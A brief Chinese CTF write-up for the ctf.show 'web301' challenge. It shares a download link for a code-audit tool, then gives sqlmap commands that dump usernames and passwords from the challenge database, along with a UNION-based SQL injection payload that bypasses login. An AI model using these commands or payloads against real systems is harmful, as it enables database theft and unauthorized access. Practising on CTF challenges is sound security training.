[huayang]
该来的还是要来
分享个代码审计的工具Seay
链接: https://pan.baidu.com/s/1Bf4CzqN2Dk1NjCpnC2laXA 密码: c99g
web301
下载源码审计看看
我审nm个*****
去看看检测登录的checklogin.php文件
sql语句没有任何过滤
sqlmap跑一下
因为这里看不见注入点
所以就需要用bp抓包引入数据
复制数据保存为test.txt文件
python3 sqlmap.py -r test.txt --dbs
python3 sqlmap.py -r test.txt -D sds --tables --batch
python3 sqlmap.py -r test.txt -D sds -T sds_user --columns --batch
python3 sqlmap.py -r test.txt -D sds -T sds_user -C sds_password --dump --batch
python3 sqlmap.py -r test.txt -D sds -T sds_user -C sds_username --dump --batch
当然也可以直接使用sqlmap表单查询搞下来,只不过时间有点久
python3 sqlmap.py -u http://396c27a6-b4b7-4010-880a-b51531e43147.chall.ctf.show/login.php --forms --batch --dump
方法二
具体可参照https://hellohy.top/huayang/658.html
userid='union select'1'#&userpwd=1[/huayang]
FROM:浅浅淡淡[hellohy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论